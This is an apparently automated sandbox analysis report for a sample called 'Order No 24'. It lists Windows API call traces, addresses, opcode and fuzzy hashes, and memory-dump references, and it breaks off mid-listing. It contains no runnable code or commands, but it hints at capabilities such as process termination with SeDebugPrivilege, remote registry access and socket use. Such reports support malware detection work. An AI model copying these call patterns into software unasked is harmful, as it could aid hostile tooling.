• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
• Instruction ID: 8b6bed637d1e7210133c23daf76770ffd0ec4d68220cd54abaa65ed3801d0296
• Opcode Fuzzy Hash: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
• Instruction Fuzzy Hash: 805110B2E092195ADF50EB94D841EDEB3BCAF49320F0044AEF605E3141EA7496C5CFA5
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDCF2
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
• Instruction ID: dfb83b6c3a51122c9e8053d56c24c70ac865d7a39c139a77924bbc41cfa810af
• Opcode Fuzzy Hash: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
• Instruction Fuzzy Hash: 02411871216284DBDF39CB6E8D8DB3A7A9EBB96305F19080DF28782561D675BC81C321
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB26C
• HeapAlloc.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB288
• GetCurrentProcess.KERNEL32(?,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB290
• DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB2A3
• GetCurrentProcess.KERNEL32(009BAEF1,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AB
• DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AE
• CreateThread.KERNEL32(00000000,00000000,009BB2D4,00000000,00000000,00000000), ref: 009BB2C8
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
• Instruction ID: 31020f3042f2fdbc373eddddb7f748561f14ba9f3c89e307d809d151b74758ac
• Opcode Fuzzy Hash: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
• Instruction Fuzzy Hash: 2A01BBB6240308BFE710EBE5DD49F6B7BACEB88711F018411FA05DB1A1CA749802CB61
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 7f22cff4c8cc026772d175ae737eb04e55e309018669c2225a920edb6eb35a82
• Instruction ID: 8397b9a8a2c9a8fce3a7256cb3eb8afc7a77a89aec7cc780ac4de76e06628974
• Opcode Fuzzy Hash: 7f22cff4c8cc026772d175ae737eb04e55e309018669c2225a920edb6eb35a82
• Instruction Fuzzy Hash: 3CE1C2B1A4021AABDF14DFA4D981FAE77B9EF48354F14842AF905AB380D770ED41CB90
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 1153735e550e8fde05c45c8c5500ce6690f4694ef66ea28484fc0ad7ea5acdaf
                                                                                                                                  • Instruction ID: 4349d4da6c573064ff3c9d4f3426c056703b67a81484ba3b70dec8f396e41800
                                                                                                                                  • Opcode Fuzzy Hash: 1153735e550e8fde05c45c8c5500ce6690f4694ef66ea28484fc0ad7ea5acdaf
                                                                                                                                  • Instruction Fuzzy Hash: 6A919E71A40219EBDF24CFA5C844FAEBBB9EF85710F11855AF505AB280DB749941CFA0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009E9B19
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 009E9B2D
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009E9B47
                                                                                                                                  • _wcscat.LIBCMT ref: 009E9BA2
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 009E9BB9
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009E9BE7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  • Opcode ID: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                                                                                                                  • Instruction ID: d50acce381fc209e95af265dedd4b76845e69290582d2dab57767ae7d991e29b
                                                                                                                                  • Opcode Fuzzy Hash: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                                                                                                                  • Instruction Fuzzy Hash: 15419071900348EBDB22DFA4DC85BEE77B8EF48350F10482AF589A7291D7759D85CB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                                                                                                                    • Part of subcall function 009C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                                                                                                                    • Part of subcall function 009C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E179A
                                                                                                                                  • GetLastError.KERNEL32 ref: 009E17AD
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E17D9
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009E1855
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 009E1860
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009E1895
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  • Opcode ID: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                                                                                                                  • Instruction ID: ecdf50793a531a20f9ba0b25cadc33fd148a388ac0d94921987edecea63c5583
                                                                                                                                  • Opcode Fuzzy Hash: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                                                                                                                  • Instruction Fuzzy Hash: 0441AE72A00200AFDB06EF99C8A5F6DB7A5AF84710F04849DF9069F2C2DB75ED41CB51
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 009C58B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  • Opcode ID: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                                                                                                                  • Instruction ID: cab46ae07622c2b727640e84aeda89b1d16d93b86569b3d8a700c264bd064c61
                                                                                                                                  • Opcode Fuzzy Hash: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                                                                                                                  • Instruction Fuzzy Hash: 77110D36A0DB47BFFB015B549C82F6B639CAF55320F21043EF500F52C1E764BA8042A6
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 009CA806
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  • Opcode ID: ac8e34b446f5799adf200077c6876fdd58eb39a2bf07ec9e8ba5bcc224cf9833
                                                                                                                                  • Instruction ID: 8cb7b512a20c83b57548d262bcf59e7d6dea98854274f52ae7256b7bd0e0a496
                                                                                                                                  • Opcode Fuzzy Hash: ac8e34b446f5799adf200077c6876fdd58eb39a2bf07ec9e8ba5bcc224cf9833
                                                                                                                                  • Instruction Fuzzy Hash: ABC17A75E0020E9FDB00CF98D495BAEB7B5FF08319F20446DE606E7291D735AA42CB92
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009C6B63
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009C6B6A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009C6B80
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009C6B87
                                                                                                                                  • _wprintf.LIBCMT ref: 009C6BAD
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C6BCB
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 009C6BA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  • Opcode ID: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                                                                                                                  • Instruction ID: 01fe5eea6a5d38b7dbe661ebc191e3a768598b8aa1fdd5faf3a8cd719bd91096
                                                                                                                                  • Opcode Fuzzy Hash: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                                                                                                                  • Instruction Fuzzy Hash: 340112F790021C7FEB11E7E49D89EE6766CD704304F0045A5B745D6041EA749E868B71
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2BF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2595220575-0
                                                                                                                                  • Opcode ID: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                                                                                                                  • Instruction ID: a028529b5b0cd376f56c4b954e2e9e865edb54bd0f3fd69c873deb3773e23e9b
                                                                                                                                  • Opcode Fuzzy Hash: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                                                                                                                  • Instruction Fuzzy Hash: 88917C71604241AFCB01EF55C891B6EB7E9FF88310F14885DF99A972A1DB34ED45CB42
                                                                                                                                  APIs
                                                                                                                                  • select.WSOCK32 ref: 009D9691
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D969E
                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009D96C8
                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009D96E9
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D96F8
                                                                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 009D97AA
                                                                                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00A1DC00), ref: 009D9765
                                                                                                                                    • Part of subcall function 009BD2FF: _strlen.LIBCMT ref: 009BD309
                                                                                                                                  • _strlen.LIBCMT ref: 009D9800
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3480843537-0
                                                                                                                                  • Opcode ID: c9836f8c00615395e6c781c40f089ac8f18aa7c4b966ab38d3ee30457647c944
                                                                                                                                  • Instruction ID: 01164fae0ee1afd8abdf630a12cf06eade05cd14a78223aba733d1433a6c3057
                                                                                                                                  • Opcode Fuzzy Hash: c9836f8c00615395e6c781c40f089ac8f18aa7c4b966ab38d3ee30457647c944
                                                                                                                                  • Instruction Fuzzy Hash: AD819B72504240ABC714EFA4CC85F6BBBA9EFC5714F108A1EF5559B291EB30D905CBA2
                                                                                                                                  APIs
                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 009AA991
                                                                                                                                    • Part of subcall function 009A7D7C: __FF_MSGBANNER.LIBCMT ref: 009A7D91
                                                                                                                                    • Part of subcall function 009A7D7C: __NMSG_WRITE.LIBCMT ref: 009A7D98
                                                                                                                                    • Part of subcall function 009A7D7C: __malloc_crt.LIBCMT ref: 009A7DB8
                                                                                                                                  • __lock.LIBCMT ref: 009AA9A4
                                                                                                                                  • __lock.LIBCMT ref: 009AA9F0
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA0C
                                                                                                                                  • EnterCriticalSection.KERNEL32(8000000C,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA29
                                                                                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 009AAA39
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                  • Opcode ID: 6b50c67d1937bc8e8835613ab3c940c1da684169f94abd58c2a971cb6cd1a4d5
                                                                                                                                  • Instruction ID: d7ee2861e1e5154355baaf1c7515f396b10b5283edd35cbf7b96a71b19dc32f7
                                                                                                                                  • Opcode Fuzzy Hash: 6b50c67d1937bc8e8835613ab3c940c1da684169f94abd58c2a971cb6cd1a4d5
                                                                                                                                  • Instruction Fuzzy Hash: 33416775A007069BEB10CFA8CA4579CB7F5AF83334F248318E525AB2D2D7749802CBD2
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009E8EE4
                                                                                                                                  • GetDC.USER32(00000000), ref: 009E8EEC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E8EF7
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009E8F03
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 009E8F3F
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009E8F50
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 009E8F8A
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009E8FAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                                                                                                                  • Instruction ID: 514649884d9c020b17ca4c8c35eab011a5939eebea58e2c5c21904e7f8a5f0b0
                                                                                                                                  • Opcode Fuzzy Hash: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                                                                                                                  • Instruction Fuzzy Hash: C4315C72100254BFEB118F95CC89FAB3BAEEB49715F044065FE099A191CA759C42CBB0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • _wcstok.LIBCMT ref: 009D184E
                                                                                                                                  • _wcscpy.LIBCMT ref: 009D18DD
                                                                                                                                  • _memset.LIBCMT ref: 009D1910
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                  • Opcode ID: ae89dcf22d50251a14696deb725b6a484ec653de7c93df544aea8545add8ae80
                                                                                                                                  • Instruction ID: b13eaa7cc2f58a7e1ec38334f2c466f56ab6964dd97be3b5ffd6afcc9c800629
                                                                                                                                  • Opcode Fuzzy Hash: ae89dcf22d50251a14696deb725b6a484ec653de7c93df544aea8545add8ae80
                                                                                                                                  • Instruction Fuzzy Hash: 80C18075608341AFC714EF64C995B5AB7E4BF85350F00892EF89A973A2DB30ED05CB82
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 009F016D
                                                                                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009F038D
                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009F03AB
